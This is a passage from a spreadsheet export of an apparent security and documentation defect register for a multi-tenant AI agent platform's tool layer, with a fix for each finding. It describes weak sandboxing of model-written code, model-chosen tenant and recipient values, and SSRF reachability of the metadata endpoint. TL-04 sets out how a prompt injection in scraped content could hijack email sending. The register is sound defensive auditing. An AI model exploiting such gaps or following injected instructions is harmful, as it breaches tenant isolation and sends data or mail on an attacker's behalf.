&gt; **Reasoning strategy** — REACT, CHAIN_OF_THOUGHT, REFLECTION, TREE_OF_THOUGHTS
`REFLECTION` and `TREE_OF_THOUGHTS` are in `DEPRECATED_REASONING_MODES`. They are still
accepted and emit a deprecation warning, and a data migration
(`p12_retire_reasoning_modes`) already moved existing entities off them.
The glossary presents four equal options where there are two.
- [`ai/schemas/enums.py`](../../../backend/src/ai/schemas/enums.py) — `DEPRECATED_REASONING_MODES`
---</t>
  </si>
  <si>
    <t>5. T3 — Glossary and navigation</t>
  </si>
  <si>
    <t>ON-16</t>
  </si>
  <si>
    <t>"42 boolean + 5 numeric flags" is right and unhelpful</t>
  </si>
  <si>
    <t>### ON-16 — "42 boolean + 5 numeric flags" is right and unhelpful
**✅ Verified · Low**
The count is exactly correct — `DEFAULTS` has 42 keys and `NUMERIC_DEFAULTS` has 5.
What the number does not convey is that **at least eight of them have no reader**
([GH-16](15-GOVERNANCE-AND-HITL-DEFECTS.md#4-t2--feature-flags-that-are-not-controls)), and
one of those actively contradicts the runtime
([TX-01](09-TOOLS-DEFECTS.md#tx-01--the-per-company-sandbox-flag-is-never-read)).
"42 flags change behaviour at runtime" is the sentence in the document. Roughly 34 do.
---</t>
  </si>
  <si>
    <t>ON-17</t>
  </si>
  <si>
    <t>The glossary defines terms for features that do not run</t>
  </si>
  <si>
    <t>### ON-17 — The glossary defines terms for features that do not run
**📄 Doc-reported · Low**
`Viewport`, `ScopePolicy` and `Memory domain` are all defined as live concepts. All three
belong to the memory read path, which has no callers
([ON-05](#on-05--section-33-describes-a-memory-block-that-is-never-injected)).
They are correct descriptions of the design. They should be marked as design-not-yet-wired,
the way the document already marks other things honestly.
---</t>
  </si>
  <si>
    <t>ON-18</t>
  </si>
  <si>
    <t>The "20-minute tour" points at documents whose 60-second sections describe unwired features</t>
  </si>
  <si>
    <t>### ON-18 — The "20-minute tour" points at documents whose 60-second sections describe unwired features
**📄 Doc-reported · Low**
The recommended fast path is to read only §1 of documents 01–19. That is good advice, and
those sections are where the aspirational descriptions are densest — memory injection,
credit gating at four points, 98 tools, the visibility gate.
Each of those is corrected later in its own document, in a section the tour skips.
**Fix:** a one-line "known gaps" pointer at the end of every §1, linking to that document's
register in this folder.
---</t>
  </si>
  <si>
    <t>TL-01</t>
  </si>
  <si>
    <t>The default sandbox runs LLM-authored code as the backend OS user</t>
  </si>
  <si>
    <t>Tool Layer</t>
  </si>
  <si>
    <t>### TL-01 — The default sandbox runs LLM-authored code as the backend OS user
**✅ Verified · Critical**
`get_sandbox_runtime` returns `SubprocessRuntime` unless
`SANDBOX_CONTAINER_RUNTIME_ENABLED` or the per-company
`sandbox.container_runtime_enabled` flag is on — **both default off**. Worse, the
container branch is wrapped in a bare `except Exception` that falls back to
`SubprocessRuntime` on any failure, so a missing Docker socket silently downgrades to
running untrusted code on the host rather than failing the call.
Under `SubprocessRuntime` the "sandbox" is `asyncio.create_subprocess_exec` running as
the API process's own OS user, with the full host filesystem readable, unrestricted
outbound network, and no cgroup memory/CPU/PID limits. The real isolation —
`--cap-drop ALL`, `--read-only`, uid 10001, resource limits — exists only in
`ContainerRuntime`.
- [`ai/tools/sandbox/runtime.py`](../../../backend/src/ai/tools/sandbox/runtime.py) — `_container_runtime_selected`, `get_sandbox_runtime`
- Affects `sandbox_code`, `terminal`, `_ffmpeg`, and tool synthesis</t>
  </si>
  <si>
    <t>**Fix:** flip the default (see [TL-16](#tl-16--the-tenant-workspace-lives-in-tmp-and-is-node-local) first — it is a prerequisite), and make a Docker failure a loud error rather than a downgrade.
---</t>
  </si>
  <si>
    <t>TOOL-LAYER-DEFECTS.md</t>
  </si>
  <si>
    <t>2. T0 — Tenant boundary and untrusted code</t>
  </si>
  <si>
    <t>TL-02</t>
  </si>
  <si>
    <t>Tool synthesis executes generated code outside the sandbox</t>
  </si>
  <si>
    <t>### TL-02 — Tool synthesis executes generated code outside the sandbox
**✅ Verified · Critical**
`ToolSandboxTester.run_examples` allocates its harness workdir with
`tempfile.mkdtemp(prefix="toolsynth_")` — bare `/tmp`, not the tenant workspace. That
path is **not** bind-mounted into the tenant container, and the container's `/tmp` is a
fresh tmpfs, so under `ContainerRuntime` the `cwd` does not exist and the exec fails.
The consequence is that the **only configuration in which tool synthesis works is the
one where the generated code runs unsandboxed on the host**. The design stated in
`09-tools.md` — "synthesized source never runs in-process, only inside the container" —
is exactly inverted in practice.
Two further problems in the same path:
1. The harness calls `inst.run(ex["input"])`, never `run_with_context`, so
   `ExecutionContext` never reaches a synthesized tool at all.
2. `SandboxedSynthesizedTool.run_with_context` replays the **test harness** on every
   production call — six files written and an interpreter spawned per invocation.</t>
  </si>
  <si>
    <t>- [`ai/meta/tool_sandbox_tester.py`](../../../backend/src/ai/meta/tool_sandbox_tester.py) — `run_examples`, workdir allocation; `_harness_main` calls `inst.run`
- [`ai/tools/sandbox/synthesized_tool.py`](../../../backend/src/ai/tools/sandbox/synthesized_tool.py) — `run_with_context`
- [`ai/tools/sandbox/tenant_manager.py`](../../../backend/src/ai/tools/sandbox/tenant_manager.py) — `_mounts`
**Fix:** allocate the harness under the tenant workspace. Longer term, replace the
per-call harness replay with a `SkillRunner` that execs into the long-lived container.
---</t>
  </si>
  <si>
    <t>TL-03</t>
  </si>
  <si>
    <t>LLM-supplied company_id is accepted as the tenant boundary</t>
  </si>
  <si>
    <t>### TL-03 — LLM-supplied `company_id` is accepted as the tenant boundary
**✅ Verified · Critical**
The pattern `context.get("company_id") if context else params.get("company_id")` — or a
variant — appears across the email, social, video, document and file tools. Any path
that reaches a tool through `run()` passes `context=None`, at which point **the model
chooses the tenant**.
`pdf_generator` is the worst case: it injects the context value only when the params
*lack* one, so an LLM-supplied `company_id` wins outright.
- [`ai/tools/email/email_tool.py:186`](../../../backend/src/ai/tools/email/email_tool.py:186), [`:304`](../../../backend/src/ai/tools/email/email_tool.py:304), [`:402`](../../../backend/src/ai/tools/email/email_tool.py:402), [`:521`](../../../backend/src/ai/tools/email/email_tool.py:521)
- [`ai/tools/social/base.py:66`](../../../backend/src/ai/tools/social/base.py:66) — affects all 64 social tools
- [`ai/tools/documents/pdf_generator.py:231`](../../../backend/src/ai/tools/documents/pdf_generator.py:231) and [`:251`](../../../backend/src/ai/tools/documents/pdf_generator.py:251)</t>
  </si>
  <si>
    <t>- [`ai/tools/documents/docx_tool.py:131`](../../../backend/src/ai/tools/documents/docx_tool.py:131) · [`pptx_tool.py:146`](../../../backend/src/ai/tools/documents/pptx_tool.py:146) · [`excel.py:193`](../../../backend/src/ai/tools/documents/excel.py:193) · [`document_save.py:76`](../../../backend/src/ai/tools/documents/document_save.py:76)
- [`ai/tools/core/file_writer.py:46`](../../../backend/src/ai/tools/core/file_writer.py:46) and [`:48`](../../../backend/src/ai/tools/core/file_writer.py:48)
- [`ai/tools/media/image_generation.py:187`](../../../backend/src/ai/tools/media/image_generation.py:187) · [`video/video_generate.py:113`](../../../backend/src/ai/tools/media/video/video_generate.py:113) · [`video/video_edit.py:94`](../../../backend/src/ai/tools/media/video/video_edit.py:94) · [`video/video_add_sound.py:93`](../../../backend/src/ai/tools/media/video/video_add_sound.py:93)
**Fix:** remove every `params` fallback and fail closed when context is absent. Tenancy
must come from a frozen `ExecutionContext` the tool cannot construct.
---</t>
  </si>
  <si>
    <t>TL-04</t>
  </si>
  <si>
    <t>email_send lets the model override the SMTP server and password</t>
  </si>
  <si>
    <t>### TL-04 — `email_send` lets the model override the SMTP server and password
**✅ Verified · Critical**
Credential resolution reads `params.get("password") or resolved.get("password")` — the
**model's value takes precedence** over the decrypted `email_connections` row. The same
applies to `smtp_host` and `email_address`.
This turns any prompt injection — for example, content returned by `scraper_tool` from
an attacker-controlled page — into an outbound mail relay with attacker-controlled
infrastructure, sent from the tenant's identity.
- [`ai/tools/email/email_tool.py:521`](../../../backend/src/ai/tools/email/email_tool.py:521) onwards — `EmailSendTool.run_with_context`, credential resolution block
**Fix:** delete `smtp_host`, `smtp_port`, `password` and `email_address` from the
accepted params entirely. Resolve them only from the connection row.
---</t>
  </si>
  <si>
    <t>TL-05</t>
  </si>
  <si>
    <t>The typed dispatch path silently drops execution context in scraper_tool</t>
  </si>
  <si>
    <t>### TL-05 — The typed dispatch path silently drops execution context in `scraper_tool`
**✅ Verified · Critical**
`ScraperTool.run_typed(params)` declares no `context` parameter. The executor inspects
the signature and, finding none, calls `run_typed(typed_params)` without one. Because
`run_typed` is overridden, this path is taken whenever the model supplies a dict —
which is the normal REACT case.
Downstream, `run_with_context(..., context=None)` means `company_id` is `None`, so:
1. The Firecrawl key resolves via `_get_app_company_id()` — the **APP company's** key
   is spent for a tenant's scrape.
2. `save_artifact` is called with `target_company_id = app_company_id` — the tenant's
   scraped content is written into a **different company's artifact store**.
3. `run_id`, `agent_id` and `campaign_id` are all `None`, so the artifact is orphaned.
- [`ai/tools/core/scraper.py:192`](../../../backend/src/ai/tools/core/scraper.py:192) — `run_typed`
- [`ai/tool_executor.py:125`](../../../backend/src/ai/tool_executor.py:125) onwards — typed dispatch and signature inspection
**Fix:** add `context: Optional[Dict] = None` to `ScraperTool.run_typed` and forward it,</t>
  </si>
  <si>
    <t>matching `WebSearchTool`. Then delete the typed path entirely — see
[TL-41](#tl-41--four-dispatch-paths-and-the-typed-one-fails-silently).
---</t>
  </si>
  <si>
    <t>TL-06</t>
  </si>
  <si>
    <t>The tool-registry read endpoints return every tenant's rows</t>
  </si>
  <si>
    <t>### TL-06 — The tool-registry read endpoints return every tenant's rows
**✅ Verified · Critical**
`list_all_tools()` executes `select(ToolRegistryEntry)` with **no company filter**, and
`get_tool(tool_id)` loads by primary key with **no ownership check**. Both routes depend
only on `get_current_user` — any authenticated user of any tenant can read every row.
For `SYNTHESIZED` rows the `configuration` blob contains the full LLM-generated
`source`, the `spec`, and the complete red-team audit trail.
- [`ai/tool_management_service.py:76`](../../../backend/src/ai/tool_management_service.py:76) — `list_all_tools`
- [`ai/tool_management_service.py:182`](../../../backend/src/ai/tool_management_service.py:182) — `get_tool`
- [`ai/tool_management_router.py:34`](../../../backend/src/ai/tool_management_router.py:34) and [`:44`](../../../backend/src/ai/tool_management_router.py:44)
**Fix:** filter on `company_id.is_(None) | company_id == current_user.company_id`, and
never return `configuration` on the list route.
---</t>
  </si>
  <si>
    <t>TL-07</t>
  </si>
  <si>
    <t>A process-global symlink points at whichever tenant ran last</t>
  </si>
  <si>
    <t>### TL-07 — A process-global symlink points at whichever tenant ran last
**✅ Verified · Critical**
`SandboxCodeTool` repoints `/tmp/sandbox/output` at the current company's directory on
**every call**. The tool's own description encourages generated code to write to that
generic path. Under concurrency, tenant A's code writes into tenant B's workspace, and
the artifact scan then registers the result to whichever run is scanning.
- [`ai/tools/sandbox/sandbox_executor.py:127`](../../../backend/src/ai/tools/sandbox/sandbox_executor.py:127)–137
**Fix:** delete the symlink. Give generated code the resolved per-company path through
the prompt, or an env var the runtime sets per exec.
---</t>
  </si>
  <si>
    <t>TL-08</t>
  </si>
  <si>
    <t>No SSRF guard on scraper_tool or headless_browser</t>
  </si>
  <si>
    <t>### TL-08 — No SSRF guard on `scraper_tool` or `headless_browser`
**✅ Verified · Critical**
Neither tool has a URL allow-list or a private-address deny list.
`http://169.254.169.254/` (cloud instance metadata) and `http://localhost:8000/` (the
platform's own API) are both reachable. `headless_browser` blocks the `file:`,
`javascript:`, `data:` and `ftp:` schemes on the **top-level URL only** — its
`evaluate` action runs arbitrary page JavaScript by design, and nothing stops the
browser being navigated to an internal host.
- [`ai/tools/sandbox/browser_tool.py:54`](../../../backend/src/ai/tools/sandbox/browser_tool.py:54) — `_BLOCKED_URL_SCHEMES`, scheme check only
- [`ai/tools/core/scraper.py`](../../../backend/src/ai/tools/core/scraper.py) — no URL validation at all
**Fix:** resolve the host and reject RFC1918, loopback, link-local and unique-local
targets before the request, on both tools. Re-check after redirects.
---</t>
  </si>
  <si>
    <t>TL-09</t>
  </si>
  <si>
    <t>Subject data is model-chosen with no ownership check</t>
  </si>
  <si>
    <t>### TL-09 — Subject data is model-chosen with no ownership check
**✅ Verified · Critical**
Credentials are resolved server-side everywhere — that half of the "tools fetch their
own sensitive data" rule is genuinely implemented. **Subject** data is not: who the
message goes to, which record is written, which ad account is charged, all come from
the model as plain parameters with no binding to the run.
| Tool | Model-supplied parameter | Controls |
|---|---|---|
| `whatsapp_send_tenant` | `to` | Destination phone number |
| `email_send` / `email_draft` | `to`, `cc`, `bcc` | Recipients |
| `email_send` | `attachment_artifact_id` | Which file leaves the building |
| `crm_update_lead` | `lead_id` | Which CRM record is overwritten |
| `google_calendar_create_event` | attendees | Invitee addresses |
| `youtube_ads_*` | `customer_id` | Which Google Ads account is charged |
| `x_ads_*`, `snapchat_ads_*`, `meta_ads_*` | `account_id` / `ad_account_id` | Which ad account is charged |
Note the inconsistency: `google_ads` reads `customer_id` from server-side
`oauth_metadata`, while `youtube_ads` takes it from the model. The correct pattern</t>
  </si>
  <si>
    <t>already exists in the codebase; it is simply not applied.
- [`ai/tools/crm/crm_tools.py:120`](../../../backend/src/ai/tools/crm/crm_tools.py:120) — `WhatsAppSendTenantTool`
- [`ai/tools/crm/crm_tools.py:445`](../../../backend/src/ai/tools/crm/crm_tools.py:445) — `CRMUpdateLeadTool`
- [`ai/tools/social/youtube_ads.py:74`](../../../backend/src/ai/tools/social/youtube_ads.py:74) — `params["customer_id"]`
- [`ai/tools/social/google_ads.py`](../../../backend/src/ai/tools/social/google_ads.py) — the correct pattern, for contrast
**Fix:** opaque run-scoped references (`ContactRef`, `LeadRef`, `AdAccountRef`,
`ArtifactRef`) minted by the platform and dereferenced server-side, asserting both
tenant ownership and membership of the run's declared subject scope. The model never
holds the raw value.
---</t>
  </si>
  <si>
    <t>TL-10</t>
  </si>
  <si>
    <t>Tenant-scoped tools are unreachable by construction</t>
  </si>
  <si>
    <t>### TL-10 — Tenant-scoped tools are unreachable by construction
**✅ Verified · Critical**
Both executor entry points call `ToolRegistry.get_tool(tool_name)` with **no**
`company_id`, and `get_tool_schemas` calls `get_all_schemas()` with none either. The
`_tenant_tools` dict is therefore never consulted on any execution or advertisement
path.
So MCP adapters and synthesized DRAFT tools are neither offered to the model nor
resolvable if it names one. The in-process/restart-loss concern documented in
`09-tools.md` is real but **secondary** — they do not work even in the process that
registered them.
- [`ai/tool_executor.py:119`](../../../backend/src/ai/tool_executor.py:119) and [`:226`](../../../backend/src/ai/tool_executor.py:226) — `get_tool` without `company_id`
- [`ai/tool_executor.py:287`](../../../backend/src/ai/tool_executor.py:287) — `get_all_schemas()` without `company_id`
- Registrations that go nowhere: [`ai/tools/mcp/adapter.py:165`](../../../backend/src/ai/tools/mcp/adapter.py:165), [`ai/meta/tool_synthesis_pipeline.py:95`](../../../backend/src/ai/meta/tool_synthesis_pipeline.py:95)</t>
  </si>
  <si>
    <t>**Fix:** thread `company_id` through resolution. Longer term, load tenant manifests from
Postgres so a restart loses nothing.
---</t>
  </si>
  <si>
    <t>3. T1 — Declared but not enforced</t>
  </si>
  <si>
    <t>TL-11</t>
  </si>
  <si>
    <t>The only "enforced" rate limit is never populated</t>
  </si>
  <si>
    <t>### TL-11 — The only "enforced" rate limit is never populated
**✅ Verified · High**
`execute_from_function_calls` reads `call.get("rate_limit_per_run")` and skips the tool
when the count exceeds it. **No caller ever sets that key** on a call dict — not
`step_executor`, not `ToolResilience`, not the voice handler. The limit is unreachable,
so the whole `call_counts` mechanism only counts.
Separately, the docstring says to pass a fresh dict per `ExecutionRun`; the actual
caller resets it per **step**.
- [`ai/tool_executor.py:101`](../../../backend/src/ai/tool_executor.py:101) — the read
- Callers that never write it: [`ai/step_executor.py:900`](../../../backend/src/ai/step_executor.py:900), [`ai/tools/resilience.py:277`](../../../backend/src/ai/tools/resilience.py:277), [`voice/websocket_handler.py:998`](../../../backend/src/voice/websocket_handler.py:998)
- [`ai/step_executor.py:859`](../../../backend/src/ai/step_executor.py:859) — the per-step reset
---</t>
  </si>
  <si>
    <t>TL-12</t>
  </si>
  <si>
    <t>The per-tool permission model sits on a class nothing uses</t>
  </si>
  <si>
    <t>### TL-12 — The per-tool permission model sits on a class nothing uses
**✅ Verified · High**
`ToolDefinition` declares `access_level`, `permissions`, `sandbox_mode`,
`max_execution_seconds` and `rate_limit_per_run`. But `Capabilities.tools` is typed
`List[ToolReference]` — which has `tool_id` and nothing else. Every permission field is
dropped the moment capabilities round-trip through the model.
`usage` (`AUTONOMOUS` / `PLANNED` / `BOTH`) is not declared on **either** class;
`step_executor` reads it off the raw dict with a default. And `usage` is not access
control in any case — a `PLANNED` tool is still fully executable, just not advertised.
- [`ai/schemas/capabilities.py:32`](../../../backend/src/ai/schemas/capabilities.py:32)–46 — `ToolDefinition`
- [`ai/schemas/capabilities.py:126`](../../../backend/src/ai/schemas/capabilities.py:126) — `Capabilities.tools: List[ToolReference]`
- [`ai/step_executor.py:727`](../../../backend/src/ai/step_executor.py:727) — `t.get("usage", "AUTONOMOUS")`
**Fix:** move these onto a typed `ToolGrant` on the entity and enforce at resolution.
Split `usage` into two independent flags — `llm_callable` and `plan_callable` — so</t>
  </si>
  <si>
    <t>"not advertised" and "not callable" stop being the same word.
---</t>
  </si>
  <si>
    <t>TL-13</t>
  </si>
  <si>
    <t>The tool status gate is not wired into execution</t>
  </si>
  <si>
    <t>### TL-13 — The tool status gate is not wired into execution
**✅ Verified · High**
`ToolRegistry.get_visible_tools_for_company` merges global and tenant tools, drops
`DEPRECATED`, and requires `tools.experimental.{tool_id}` for `EXPERIMENTAL` and
`DRAFT`. It is referenced only by `tests/unit/test_tool_status.py` and a comment in
`social/base.py`.
The live path builds schemas straight from `capabilities.tools` via
`ToolExecutor.get_tool_schemas`. Practically: **69 unverified tools — including 64
capable of publishing content or spending ad budget — execute today if an entity names
them**, regardless of the flag. The flag-flip endpoint exists and writes real rows that
nothing reads.
- [`ai/tools/base.py:192`](../../../backend/src/ai/tools/base.py:192) — `get_visible_tools_for_company`
- [`ai/step_executor.py:755`](../../../backend/src/ai/step_executor.py:755) — the live path that bypasses it
- [`ai/api/admin.py:479`](../../../backend/src/ai/api/admin.py:479) — the flag endpoint
---</t>
  </si>
  <si>
    <t>TL-14</t>
  </si>
  <si>
    <t>is_enabled = false does not disable anything</t>
  </si>
  <si>
    <t>### TL-14 — `is_enabled = false` does not disable anything
**✅ Verified · High**
The executor resolves tools through `ToolRegistry.get_tool()`, which never consults the
database. Toggling a tool off hides it from `ToolSelectionPanel` only; entities that
already reference it keep calling it. An admin who toggles a tool off will reasonably
believe it is off.
Kill-switching a tool today means deleting its `ToolRegistry.register(...)` line and
redeploying.
- [`ai/tool_management_router.py:94`](../../../backend/src/ai/tool_management_router.py:94) — the toggle route
- [`frontend/src/components/ToolSelectionPanel.tsx`](../../../frontend/src/components/ToolSelectionPanel.tsx) — the only consumer
- Root cause: Fault A
---</t>
  </si>
  <si>
    <t>TL-15</t>
  </si>
  <si>
    <t>NetworkPolicy and the egress proxy are wired to nothing</t>
  </si>
  <si>
    <t>### TL-15 — `NetworkPolicy` and the egress proxy are wired to nothing
**✅ Verified · High**
`TenantSandboxManager.ensure()` accepts `egress: bool = False` and would join the
container to the allow-list network with `HTTP(S)_PROXY` injected.
`ContainerRuntime.exec` calls `self.manager.ensure(self.company_id)` — **positionally,
never passing `egress`**. So every container gets `--network none`.
`EgressProxyManager` — internal Docker network, tinyproxy with `FilterDefaultDeny`,
port restriction to 80/443, the entrypoint that builds the filter file — is a complete
implementation with **zero callers**. `NetworkPolicy.ALLOWLIST` on a synthesized
`ToolSpec` is decorative; the validator's comment "egress still enforced at runtime" is
not true.
- [`ai/tools/sandbox/container_runtime.py`](../../../backend/src/ai/tools/sandbox/container_runtime.py) — `exec`, the `manager.ensure` call
- [`ai/tools/sandbox/egress_proxy.py`](../../../backend/src/ai/tools/sandbox/egress_proxy.py) — no callers
- [`ai/meta/tool_validator.py:100`](../../../backend/src/ai/meta/tool_validator.py:100) — the inaccurate comment</t>
  </si>
  <si>
    <t>TL-16</t>
  </si>
  <si>
    <t>The tenant workspace lives in /tmp and is node-local</t>
  </si>
  <si>
    <t>### TL-16 — The tenant workspace lives in `/tmp` and is node-local
**✅ Verified · High**
`_sandbox_base_dir()` returns `os.path.join(tempfile.gettempdir(), "sandbox")`, so the
"persistent" per-tenant workspace is `/tmp/sandbox/{company_id}`. It does not survive a
host reboot, is subject to `systemd-tmpfiles` cleanup, and exists only on the node that
created it. Any multi-worker or multi-node deployment gives a tenant a **different**
persistent sandbox per node.
This is the prerequisite blocking [TL-01](#tl-01--the-default-sandbox-runs-llm-authored-code-as-the-backend-os-user),
persistent tenant-authored code, and the persistent browser profile feature.
- [`ai/tools/sandbox/tenant_manager.py`](../../../backend/src/ai/tools/sandbox/tenant_manager.py) — `_sandbox_base_dir`, `_mounts`
- [`ai/tools/sandbox/runtime.py`](../../../backend/src/ai/tools/sandbox/runtime.py) — `resolve_persistent_browser_dir`
**Fix:** a durable named volume per tenant, with three roots the runtime maps
identically on both sides of the boundary: `workspace` (rw scratch, TTL'd), `skills`
(ro, published tenant code), `artifacts` (write-only drop box).</t>
  </si>
  <si>
    <t>TL-17</t>
  </si>
  <si>
    <t>The video tools write outside the bind-mount</t>
  </si>
  <si>
    <t>### TL-17 — The video tools write outside the bind-mount
**✅ Verified · High**
`_BASE_ARTIFACT_DIR` resolves to `&lt;repo&gt;/artifact/system-generated`. Every ffmpeg
invocation routes through `run_sandbox_exec` with input and output paths under that
root, and `_write_concat_list` writes the concat file to `dirname(output_path)` — the
same place. None of it is mounted into the tenant container.
`video_edit` and `video_add_sound` therefore **break the moment the container runtime is
enabled**. `video_edit` also accepts an unvalidated `output_path` from the model, so
under the default host runtime it can write anywhere the backend user can.
- [`ai/tools/media/video/_support.py:22`](../../../backend/src/ai/tools/media/video/_support.py:22) — `_BASE_ARTIFACT_DIR`
- [`ai/tools/media/video/_ffmpeg.py`](../../../backend/src/ai/tools/media/video/_ffmpeg.py) — `_write_concat_list`
- [`ai/tools/media/video/video_edit.py`](../../../backend/src/ai/tools/media/video/video_edit.py) — unvalidated `output_path`
---</t>
  </si>
  <si>
    <t>TL-18</t>
  </si>
  <si>
    <t>Chromium never enters the container</t>
  </si>
  <si>
    <t>### TL-18 — Chromium never enters the container
**✅ Verified · High**
`ContainerRuntime.open_browser_session` delegates to an embedded `SubprocessRuntime`.
Enabling the container runtime does not sandbox `headless_browser` at all — Chromium
still runs on the host with the backend's privileges, and its `evaluate` action runs
arbitrary JavaScript by design.
The sandbox image is already built from the Playwright base, so the browser is present
inside the container; only the connection is missing.
- [`ai/tools/sandbox/container_runtime.py`](../../../backend/src/ai/tools/sandbox/container_runtime.py) — `open_browser_session`, `_browser_fallback`
**Fix:** run Chromium in the container and drive it over CDP. Pairs naturally with
[TL-08](#tl-08--no-ssrf-guard-on-scraper_tool-or-headless_browser).
---</t>
  </si>
  <si>
    <t>TL-19</t>
  </si>
  <si>
    <t>Four price tables, one of which is the unused source of truth</t>
  </si>
  <si>
    <t>### TL-19 — Four price tables, one of which is the unused source of truth
**✅ Verified · High**
`ToolCostResolver` was built as the Track 8 single source of truth. It has **zero
production call sites** — only its own unit test imports it. The live logic is two
hand-copied blocks of `_TOOL_SKU_MAP` / `_TOOL_FIXED_COST` literals in
`step_executor.py`, plus a fourth price table in `planning/cost_estimator.py`.
The flag intended to switch this on, `tools.cost_resolver_v2_enabled`, is declared with
a default of `True` and **is never read**.
Consequence: `image_generation` self-bills `$0.04` via `BillingService` *and* is charged
again by the executor's fixed-cost branch — a guaranteed double charge on that branch.
Adding one priced tool means editing four files.
- [`ai/governance/tool_cost_resolver.py`](../../../backend/src/ai/governance/tool_cost_resolver.py) — unused
- [`ai/step_executor.py:466`](../../../backend/src/ai/step_executor.py:466) and [`:924`](../../../backend/src/ai/step_executor.py:924) — the two inline copies
- [`ai/planning/cost_estimator.py:22`](../../../backend/src/ai/planning/cost_estimator.py:22) — the fourth table</t>
  </si>
  <si>
    <t>- [`ai/core/feature_flags.py:86`](../../../backend/src/ai/core/feature_flags.py:86) — the flag nothing reads
- [`ai/tools/media/image_generation.py:372`](../../../backend/src/ai/tools/media/image_generation.py:372) — the self-bill
---</t>
  </si>
  <si>
    <t>TL-20</t>
  </si>
  <si>
    <t>### TL-20 — Voice tool calls are unattributed and unbilled
**✅ Verified · High**
The voice handler builds `extra_context` with only `company_id` and `user_id` — **no
`run_id`, no `agent_id`** — and runs no cost block at all. A voice agent can call
`whatsapp_send_tenant` and `crm_update_lead` with no run linkage and no ledger entry.
Every `ToolInteractionLog` written from this path is therefore unlinkable to a run, and
`run.total_cost_usd` never moves.
- [`voice/websocket_handler.py:993`](../../../backend/src/voice/websocket_handler.py:993)–1000
---</t>
  </si>
  <si>
    <t>TL-21</t>
  </si>
  <si>
    <t>max_tool_calls is a prompt string, not a limit</t>
  </si>
  <si>
    <t>### TL-21 — `max_tool_calls` is a prompt string, not a limit
**✅ Verified · Medium**
`governance.execution_limits.max_tool_calls` is read only to render
`"Tool calls remaining: N of M"` into the prompt. Nothing checks it before executing,
and the number can go negative. The real ceiling on a runaway agent is the loop's
iteration and cost budget.
- [`ai/step_executor.py:673`](../../../backend/src/ai/step_executor.py:673)
---</t>
  </si>
  <si>
    <t>TL-22</t>
  </si>
  <si>
    <t>The MCP layer has no transport, no config, and no caller</t>
  </si>
  <si>
    <t>### TL-22 — The MCP layer has no transport, no config, and no caller
**✅ Verified · Medium**
`MCPClient` is a `Protocol` with no concrete implementation anywhere in the repo — no
stdio, HTTP or SSE transport. `bind_mcp_server` is called only from
`tests/unit/test_mcp_adapter.py` with a fake client. There is no `mcp_servers` table,
no admin UI and no settings entry for declaring a company's servers.
Even if all three existed, the adapters register tenant-scoped and would be unreachable
per [TL-10](#tl-10--tenant-scoped-tools-are-unreachable-by-construction).
- [`ai/tools/mcp/client.py`](../../../backend/src/ai/tools/mcp/client.py) — Protocol only
- [`ai/tools/mcp/adapter.py`](../../../backend/src/ai/tools/mcp/adapter.py) — `bind_mcp_server`, no production caller
**Fix:** decide. Either build the transport plus a config surface, or delete the package
until there is a customer for it.
---</t>
  </si>
  <si>
    <t>TL-23</t>
  </si>
  <si>
    <t>[ai/tools/social/quora.py](../../../backend/src/ai/tools/social/quora.py) — 4 tools</t>
  </si>
  <si>
    <t>| **TL-23** | [`ai/tools/social/quora.py`](../../../backend/src/ai/tools/social/quora.py) — 4 tools | Targets `https://api.quora.com/v1`. Quora publishes no such public API — no search, answers, spaces or analytics endpoints exist to call. There is nothing to fix; the surface is fabricated. If Quora presence matters, do it via `headless_browser` under an explicit automation policy | ✅ Verified |</t>
  </si>
  <si>
    <t>TL-24</t>
  </si>
  <si>
    <t>[ai/tools/social/x_ads.py](../../../backend/src/ai/tools/social/x_ads.py) — 4 tools</t>
  </si>
  <si>
    <t>| **TL-24** | [`ai/tools/social/x_ads.py`](../../../backend/src/ai/tools/social/x_ads.py) — 4 tools | Uses OAuth2 bearer headers and JSON bodies; the X Ads API expects OAuth 1.0a request signing and form-encoded parameters. Every call will 401 or 400. This is a rewrite, not a patch — delete until there is a customer | ✅ Verified |</t>
  </si>
  <si>
    <t>TL-25</t>
  </si>
  <si>
    <t>[ai/tools/social/youtube_ads.py](../../../backend/src/ai/tools/social/youtube_ads.py) — 4 tools</t>
  </si>
  <si>
    <t>| **TL-25** | [`ai/tools/social/youtube_ads.py`](../../../backend/src/ai/tools/social/youtube_ads.py) — 4 tools | Pinned to Google Ads **v17** while `google_ads` uses **v18**; takes `customer_id` from the model; no `login-customer-id` header for MCC access. A YouTube campaign is a `VIDEO` `advertisingChannelType` — fold into the `google_ads` family and four tools become zero | ✅ Verified |</t>
  </si>
  <si>
    <t>TL-26</t>
  </si>
  <si>
    <t>[ai/tools/documents/xlsx_engine.py](../../../backend/src/ai/tools/documents/xlsx_engine.py)</t>
  </si>
  <si>
    <t>| **TL-26** | [`ai/tools/documents/xlsx_engine.py`](../../../backend/src/ai/tools/documents/xlsx_engine.py) | ~400 lines, **zero imports** anywhere in `backend/src`. Its only reference is a price entry naming it in `planning/cost_estimator.py`. If the themed rendering is wanted, it belongs in the Document Factory's sandbox scripts where generated code can import it | ✅ Verified |</t>
  </si>
  <si>
    <t>TL-27</t>
  </si>
  <si>
    <t>backend/templates/docx/.docx</t>
  </si>
  <si>
    <t>| **TL-27** | `backend/templates/docx/*.docx` | Three theme templates, ~36 KB each, **zero code references**. `DocxTool._create` always starts from a blank `Document()` | ✅ Verified |</t>
  </si>
  <si>
    <t>TL-28</t>
  </si>
  <si>
    <t>[ai/governance/rate_limiter.py](../../../backend/src/ai/governance/rate_limiter.py)</t>
  </si>
  <si>
    <t>| **TL-28** | [`ai/governance/rate_limiter.py`](../../../backend/src/ai/governance/rate_limiter.py) | `RedisRateLimiter` — a correct sliding-window implementation with a documented `"tool:search:company_123"` key example and **zero call sites**. Either wire it in as the per-tenant quota (there is none today) or delete it | ✅ Verified |</t>
  </si>
  <si>
    <t>TL-29</t>
  </si>
  <si>
    <t>Duplicate _sandbox_base_dir()</t>
  </si>
  <si>
    <t>| **TL-29** | Duplicate `_sandbox_base_dir()` | Defined **twice** in [`ai/tools/sandbox/runtime.py`](../../../backend/src/ai/tools/sandbox/runtime.py); the second silently shadows the first. Harmless — they are identical — but it makes the module look unreviewed | ✅ Verified |</t>
  </si>
  <si>
    <t>TL-30</t>
  </si>
  <si>
    <t>One of the two ToolResult classes</t>
  </si>
  <si>
